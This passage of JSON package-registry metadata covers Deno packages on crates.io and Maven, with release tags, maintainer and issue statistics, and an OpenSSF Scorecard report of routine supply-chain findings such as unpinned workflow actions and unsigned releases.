no/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-24T14:59:18.862Z","dependent_packages_count":0,"downloads":222151,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":95.79244792282411,"dependent_repos_count":24.365143167900126,"dependent_packages_count":32.31740477147518,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":50.82499862073314},"purl":"pkg:cargo/deno_telemetry","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_telemetry","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_telemetry","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_telemetry/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-23T15:40:54.265Z","issues_count":6598,"pull_requests_count":9606,"avg_time_to_close_issue":17246074.663934425,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3780,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2464,"avg_comments_per_issue":2.5110639587753867,"avg_comments_per_pull_request":0.7159067249635644,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":662,"past_year_pull_requests_count":1182,"past_year_avg_time_to_close_issue":1381266.2837209303,"past_year_avg_time_to_close_pull_request":1332181.7239747634,"past_year_issues_closed_count":215,"past_year_pull_requests_closed_count":634,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":371,"past_year_avg_comments_per_issue":1.20392749244713,"past_year_avg_comments_per_pull_request":1.0829103214890017,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":464,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1778,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":376,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"dsherret","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_telemetry/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_telemetry/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_telemetry/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_telemetry/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_telemetry/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_telemetry/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2024-11-25T17:13:51.984Z","updated_at":"2024-11-25T17:13:51.984Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2024-11-30T21:09:46.226Z","updated_at":"2024-11-30T21:09:46.226Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":14141349,"name":"org.mvnpm.at.deno:linux-arm64-glibc","ecosystem":"maven","description":"linux-arm64-glibc distribution of Deno","homepage":"https://deno.land","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":"org.mvnpm.at.deno","versions_count":18,"first_release_published_at":"2025-10-20T11:23:26.000Z","latest_release_published_at":"2026-08-30T02:06:28.000Z","latest_release_number":"2.9.6","last_synced_at":"2026-09-07T22:53:50.949Z","created_at":"2026-03-28T12:01:24.759Z","updated_at":"2026-09-07T22:53:50.949Z","registry_url":"https://central.sonatype.com/artifact/org.mvnpm.at.deno/linux-arm64-glibc/","install_command":null,"documentation_url":"https://appdoc.app/artifact/org.mvnpm.at.deno/linux-arm64-glibc/","metadata":{},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has 